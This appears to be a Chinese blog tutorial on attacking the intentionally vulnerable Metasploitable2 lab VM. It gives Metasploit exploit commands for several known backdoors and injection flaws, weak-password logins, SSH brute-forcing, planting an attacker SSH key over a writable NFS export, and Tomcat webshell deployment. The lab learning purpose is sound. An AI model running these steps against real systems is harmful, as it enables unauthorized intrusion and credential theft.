Metasploitable2靶机渗透学习

news2024/9/28 23:34:29

目录

一、介绍

二、环境

三、渗透攻击

1.前期渗透

1.1主机发现

1.2.端口扫描

1.3.测试漏洞

2.弱密码漏洞

2.1系统弱密码登录(telnet :23端口)

2.2 MySQL弱密码登录(端口:3306)

2.3 PostgreSQL弱密码登录(端口:5432)

2.4 VNC弱密码登录(端口:5900)

3.Vsftpd源码包后门漏洞(21端口):

4.SSH弱口令漏洞(22端口)

5.Linux NFS共享目录配置漏洞(22端口):

6.SambaMS-RPC Shell命令注入漏洞(端口139)

7.UnrealIRCd后门漏洞(6667端口)

8.Java RMI SERVER命令执行漏洞(1099端口):

9.Ingreslock后门漏洞(1524端口)

10.PHP CGI参数注入执行漏洞(80端口)

11.Tomcat管理台默认口令漏洞(8180端口):

12.Druby远程代码执行漏洞

13.Distcc后门漏洞(3623端口)

四.总结:


一、介绍

        Metasploitable2是一款用于漏洞测试和渗透测试的虚拟机,它包含了许多已知的漏洞和弱点,可以用于测试安全工具和技术的有效性。

        当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆

下载地址:链接:https://pan.baidu.com/s/1SPDaOWEHSdR9Cjh-eESV3g 
                  提取码:8888

二、环境

1.vmware虚拟机

2.kali:ip(192.168.184.130)

3.Metasploitable2靶机 ip(192.168.184.134)

 三、渗透攻击

1.前期渗透

1.1主机发现

nmap:nmap -sP 192.168.184.1/24 (ip网段)

可判断靶机IP为134 kali为130 (141是我另一台虚拟主机 .1.2.254是kali的广播地址)

MSF:

msfconsole                                 //启动MSF
use auxiliary/scanner/discovery/arp_sweep  //use使用模块
set rhosts 192.168.184.0/24               //设置扫描网段
set threads 50                            //提高线程
run                                        //运行

MSF也可以发现靶机地址。

相互ping一下:

 1.2.端口扫描

nmap:nmap -sT 192.168.184.134(IP)

 看到可以开放端口还是不少的。

MSF:

use auxiliary/scanner/portscan/tcp   //使用模块
set rhosts 192.168.184.134   //设置远程ip
run

 端口也是多多的。

1.3.测试漏洞

nmap扫描出来使用端口协议或程序的版本:

nmap -sV -p 1-65535 192.168.184.134

nmap -O ip 查看系统类型

nmap ip --script=vuln

扫出来挺多的:


 

 

2.弱密码漏洞

原理:

系统或者数据库的登录用户,密码简单或者和用户名相同,容易通过暴力破解手段来获取密码。

影响系统/软件:

所有使用用户名/密码登录的系统/软件都有可能存在此问题。

在Metasploitable2中,系统口令、MySQL、PostgreSQL和VNC远程登录都存在弱密码漏洞。

利用:

2.1系统弱密码登录(telnet :23端口)

kali执行:

telnet ip :192.168.184.134

用户名和密码都是msfadmin

成功登录 进入系统:

2.2 MySQL弱密码登录(端口:3306)

在kali上执行mysql –h IP:192.168.184.134 –u root

登录成功 进入mysql系统:

2.3 PostgreSQL弱密码登录(端口:5432)

PostgreSQL是一个免费的对象·关系型数据库服务器(ORDBMS)

在kali上执行 psql –h ip –U postgres

输入密码postgres         

登录成功,进入postgresql系统:

2.4 VNC弱密码登录(端口:5900)

VNCViewer是一个远程桌面控制程序,它可以让用户通过网络连接到远程计算机并控制该计算机的桌面。相当于是虚拟网络控制台的应用程序。

在kali中执行 vncviewer ip

输入密码password

 登录成功 进入系统:

3.Vsftpd源码包后门漏洞(21端口):

原理:

在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

影响系统/软件

Vsftpd server v2.3.4

MSF利用

利用步骤

在kali中执行msfconsole   启动metasploit

use exploit/unix/ftp/vsftpd_234_backdoor    选择漏洞

set RHOST 192.168.184.134    设置要攻击的机器IP

exploit/run    开始攻击

利用成功  
执行uname–a  pwd  id 验证

手动利用: 

 同样我们也可以用手动用笑脸:)激活:

ftp ip 也可以用telnet激活笑脸

账号随便输入一个 user:)

Password:123456 随便输入一个 已经创建好了后面6200后门端口

nmap -p 6200 ip  查看6200端口是否开启

Nc连接:nc ip

验证:whoami  id  pwd  

利用成功

 查看端口

4.SSH弱口令漏洞(22端口)

原理:

靶机root用户存在弱口令漏洞,在使用指南里并没有指出。.

影响系统/软件:

Linux

利用步骤:

use auxiliary/scanner/ssh/ssh_login

set RHOSTS ip

set USERNAME root

set PASS_FILE xxx.txt

set THREADS 50    提高线程

run

 root口令爆破成功 ,口令为root

使用模块:

 开始爆破:

美杜莎破解:

medusa -M ssh协议 -h ip地址 -u msfadmin用户名 -P xxx.txt字典

成功登录:

靶场ssh的用户名和密码

msfadmin:msfadmin

root:root

5.Linux NFS共享目录配置漏洞(22端口):

原理:

NFS 服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登陆。

影响系统/软件:

所有Linux系统的NFS服务

利用步骤:

查看靶机上的nfs服务是否开启:rpcinfo -p ip

查看靶机上设置的远程共享目录列表:showmount -e ip

生成rsa公钥命令:sshkeygen (一直回车)

在渗透机 /tmp目录下新建文件夹xxx,以备后续挂载需求,命令:mkdir /tmp/xxx

把靶机ip的根目录挂载到渗透机上新建的/tmp/xxx/目录下;

命令:mount –o nolock –t nfs ip:/ /tmp/msftables/

把渗透机上生成的公钥追加到靶机的authorized_keys下

命令:cat /root/.ssh/id_rsa.pub >> /tmp/xxx/root/.ssh/authorized_keys

实现无密码ssh登录:ssh root@ip

进行登录验证

 

 成功

6.SambaMS-RPC Shell命令注入漏洞(端口139)

原理:

        Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

利用步骤

use exploit/multi/samba/usermap_script    选择漏洞

set RHOST ip    设置要攻击的机器IP

exploit    开始攻击

利用成功  执行uname–a验证

 利用成功

7.UnrealIRCd后门漏洞(6667端口)

原理:

在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

影响系统/软件:

Unreal UnrealIRCd3.2.8.1

利用步骤:

在kali中执行msfconsole,启动metasploit

use exploit/unix/irc/unreal_ircd_3281_backdoor 选择漏洞

set RHOST ip    设置要攻击的机器IP

exploit  开始攻击

失败用 seesions (查看控制会话) -i id

利用成功  执行uname –a验证

利用模块 设置参数: 

 sessions查看会话:

cat etc/passwd 查看用户

8.Java RMI SERVER命令执行漏洞(1099端口):

原理:

Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行

利用步骤:

Nmap –p0-65535 ip 来查看1099端口是否开启

开始利用: 

MSF
use exploit/multi/misc/java_rmi_server

show options 查看配置参数

set RHOST (靶机IP)

exploit/run

sessions -i id

shell (进入meterpreter时)

使用模块: 

 设置参数

 sessions查看会话进行攻击:

 9.Ingreslock后门漏洞(1524端口

原理:

Ingreslock后门程序运行在1524端口,连接到1524端口就能直接获得root权限,经常用于入侵一个暴露的服务器.

利用:

利用telnet连接目标主机的1524端口,直接获取root权限;

步骤:

nmap -sV -p 1524 ip 扫描目标主机端口

telnet ip 1524 连接目标主机

测试:

uname -a           查看系统类型版本
whoami             查看获取的权限
ifconfig eth0      查看网卡信息
cat /etc/passwd    查看主机的密码文件。

扫描 :

 利用成功:

 10.PHP CGI参数注入执行漏洞(80端口)

原理:

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

影响系统/软件:

before 5.3.12 and 5.4.x before 5.4.2

利用步骤:

在kali中执行msfconsole,启动metasploit

msf > useexploit/multi/http/php_cgi_arg_injection    选择漏洞

set RHOST  ip  设置要攻击的机器IP

exploit/run    开始攻击

show options 一下只需要配置ip就好:

 设置参数  利用成功:

11.Tomcat管理台默认口令漏洞(8180端口):

原理:

omcat 管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.

影响系统/软件:

Nessus

JSPwebshell

nmap -sV -p 扫描:

 利用步骤:

进入url ip:8180

国产化一下: 

用户名 密码 tomcat:tomcat 即可进入管理台

管理页面:

登录成功: 

管理器页面:

登录成功: 

国产化一下: 

MSF

在msf下可以使用use multi/http/tomcat_mgr_deploy模块利用tomcat upload功能反弹shell。

它的原理是上传一个war文件,在war文件执行对应的脚本,执行payload的内容,这个时候,就会执行反弹。

use exploit/multi/http/tomcat_mgr_deploy 使用模块

show options    查看配置参数

set rhosts ip   设置ip

set rport 8180  设置端口

set HttpUsername tomcat    设置用户名

set HttpPassword tomcat    设置密码

run/exploit     攻击

使用模块 查看配置

 设置参数

 查看参数

利用成功:

run攻击及验证 shell whoami ip addr 

 手动:

 

 

http://ip:端口/tomcat/tomcat.jsp

蚁剑 哥斯拉 冰蝎 均未成功

我也不知道为什么。。。。

可能是靶场原因 我用vulfocus开了个相关靶场:

直接上哥斯拉:

 成功:

 嘿嘿嘿:

 用户为root

12.Druby远程代码执行漏洞

原理:

Druby配置不当,被滥用执行命令(Distributed Ruby or DRb allows Ruby programs to communicate with eachother on the same machine or over a network. DRb uses remote method invocation(RMI) to pass commands and data between processes)

影响系统/软件:

Ruby 1.8

利用步骤:

nmap -sV -p 8787 ip nmap发现8787 druby端口

kali  msfconsole >启动metasploit

msf >search drb 搜索dbr相关漏洞

msf > use exploit/linux/misc/drb_remote_codeexec 使用漏洞

set URI druby:ip:8787     设置druby链接

exploit/run    开始攻击

输入id, uname -a,whoami 验证

 nmap 扫描 8787 端口开放

 漏洞找不到

13.Distcc后门漏洞(3623端口)

原理:

Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode1.5版本及其他版本的distcc2.x版本配置对于服务器端口的访问不限制。

影响系统/软件:

distcc 2.x

利用步骤:

MSF     msfconsole

use exploit/unix/misc/distcc_exec    选择漏洞

show options     查看配置参数

set RHOST ip    设置被攻击机的IP

exploit/run        开始攻击

uname  –a        验证服务器信息

nmap查看端口是否开启:


利用不成功

四.总结:

        Metasploitable2靶机主要是让我们网安小白初入kali,主要是熟悉MSF的命令与其模块的使用,漏洞比较老,所以有的payload会没有利用模块或者复现失败,最后两个漏洞没有复现出来。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/546098.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

K8s全套快速入门

K8s快速入门 1 介绍 google开源的容器化管理工具机器数量十几台、上百台时,就可以考虑使用k8s高可用、自动容灾恢复、灰度更新、一键回滚历史版本、方便伸缩扩展等 k8s集群架构: 通常:一主多从 master:主节点,控制平台…

LeetCode 栈和队列OJ题目分享

目录 有效的括号(括号匹配)用栈实现队列用队列实现栈设计循环队列 有效的括号(括号匹配) 链接: link 题目描述: 题目思路: 1、如果是左括号“( { [ ”就入栈 2、如果是右括号“) }…

Redis--弱口令未授权访问漏洞

Redis--弱口令未授权访问漏洞 一、漏洞简介二、危险等级三、漏洞影响四、入侵事件五、漏洞复现--Redis CrackIT入侵事件5.1、以root启动的redis,可以远程登入到redis console--------A主机5.2、生成公钥5.3、执行: redis-cli flushall 清空redis(非常暴力&#xff0…

2023年春秋杯网络安全联赛 春季赛 wp

文章目录 Cryptocheckinbackdoor WebPhpstudyEasypyezrustqqcms MISCSudohappy2forensic盲人会藏在哪里piphackwordle PWNp2048easy_LzhiFTP_CHELL Crypto checkin 第一部分求解一下pell函数得到x,y def solve_pell(N, numTry 100):a[]b[]cf continued_fraction(sqrt(N))f…

C++的priority_queue

priority_queue 1.priority_queue的介绍2.priority_queue的使用3.priority的模拟实现 1.priority_queue的介绍 优先队列是一种堆,默认是大根堆,可以通过greater的仿函数可以建立小根堆empty():检测容器是否为空 size():返回容器中…

【密码学复习】第七章 公钥加密体制(二)

RSA单向陷门函数及其应用 ElGamal单向陷门函数 1)密钥生成 ① 选择一大素数p,选取Zp * 的生成元g ; ② 任选小于p的随机数x,计算y≡g x mod p; ③(y, g, p)为公开密钥, (x, g, p)为秘密密钥. 2)加密:设待加密…

asp.net就业满意度问调查系统

本系统主要有会员(调查者)和管理员,他们具体的功能如下: 会员功能:注册,登录,修改个人信息,调查,查看调查结果及影响,留言,首先是会员注册,注册后…

【Web开发】Node实现Web图表功能(ECharts.js,React)

🎈🎈🎈Python实现Web图表功能系列:🎈🎈🎈1🎈【Web开发】Python实现Web图表功能(D-Tale入门)🎈2🎈【Web开发】Python实现Web图表功能&a…

整理了一份github上比较热门的ChatGPT项目,值得收藏

ChatGPT已经火了一段时间了,但是,热度依旧是各大自媒体的热榜。由于,国内不能直接访问ChatGPT,国内的开发者依托OpenAI的接口,开发出一些ChatGPT的应用。今天就整理一下github上最热门的ChatGPT项目。 lencx/ChatGPT 该项目是Cha…

java线程的状态

文章目录 1. 线程的状态2. 验证NEW、RUNNALE和TERMINATED状态3. 验证TIMED_WAITING状态4. 验证BLOCKED状态5. 验证BLOCKED状态 1. 线程的状态 线程在不同的运行时期存在不同的状态,状态信息存在于State枚举类中,如下图: 调用线程有关的方法是…

文心一言 VS 讯飞星火 VS chatgpt (18)-- 算法导论4.1 5题

五、使用如下思想为最大子数组问题设计一个非递归的、线性时间的算法。从数组的左边界开始,由左至右处理,记录到目前为止已经处理过的最大子数组。若已知 A[1…j]门的最大子数组,基于如下性质将解扩展为 A[1…j1]的最大子数组:A[1…j1]的最大…

Squid 代理服务器

Squid概述 Squid 主要提供缓存加速、应用层过滤控制的功能。 代理的工作机制 1.代替客户机向网站请求数据,从而可以隐藏用户的真实IP地址。 2.将获得的网页数据(静态 Web 元素)保存到缓存中并发送给客户机&#xff0…

Windows安装Ubuntu双系统

Windows安装Ubuntu双系统 1.下载Ubuntu 16.04,地址https://releases.ubuntu.com/16.04/ 2.下载Rufus,地址https://rufus.ie/zh/ 3.准备U盘,烧录系统 4.磁盘分区 5.重启,按住shift键 本人电脑是联想小新 Windows11系统&#xff0…

QT上位机串口+STM32单片机项目

第一个自己的上位机小项目,嘿嘿,还是有些成绩感的。 目录 1.先看QT上位机部分 1.首先写一个页面 2.mainwindow.cpp主要函数。 2.form.cpp主要函数 3.STM32部分 1.main函数 3.QT完整代码 1.shangwei.pro 2.form.h 3.mainwindow.h 4.form.cpp …

从零入门激光SLAM(十一)——如何求解SLAM问题

大家好呀,我是一个SLAM方向的在读博士,深知SLAM学习过程一路走来的坎坷,也十分感谢各位大佬的优质文章和源码。随着知识的越来越多,越来越细,我准备整理一个自己的激光SLAM学习笔记专栏,从0带大家快速上手激…

(转载)从0开始学matlab(第9天)—第一阶段总结

1.编程实例 下面的例子将向大家介绍如何用 MATLAB 解决问题。 例1 温度转换程序 问题: 设计一个 MATLAB 程序,读取一个华氏温度的输入,输出开尔文温度。 答案: 华氏温度和开尔文温度的转换关系式可在物理学课本中找到。其关系式…

HCIP-RIP双向重发布综合实验

拓扑结构: 要求: 1、两个协议间进行多点双向重发布 2、R7的环回没有宣告在OSPF协议中,而是在后期重发布进入的 3、解决环路,所有路径选择最优,且存在备份 4、R2的环回要在RIP中宣告,R3的环回要在OSPF中宣…

如何优雅的写C#,使用Visual studio

免责声明 本人接触C#,.Net一年时间,本文内容基于我平时对于C#语法的积累,如有问题请多包涵。以下内容除了C#之外,还有Visual studio编译器相关的内容。 在使用C#的一年多里面,我发现C#的语法糖真的很不错,Visual Stu…

SaaS系统用户权限设计

SaaS系统用户权限设计 学习目标: 理解RBAC模型的基本概念及设计思路 了解SAAS-HRM中权限控制的需求及表结构分析完成组织机构的基本CRUD操作 完成用户管理的基本CRUD操作完成角色管理的基本CRUD操作 组织机构管理 需求分析 需求分析 实现企业组织结构管理&#xff0…

PCB 基础~典型的PCB设计流程,典型的PCB制造流程

典型的PCB设计流程 典型的PCB制造流程 • 从客户手中拿到Gerber, Drill以及其它PCB相关文件 • 准备PCB基片和薄片 – 铜箔的底片会被粘合在基材上 • 内层图像蚀刻 – 抗腐蚀的化学药水会涂在需要保留的铜箔上(例如走线和过孔) – 其他药水…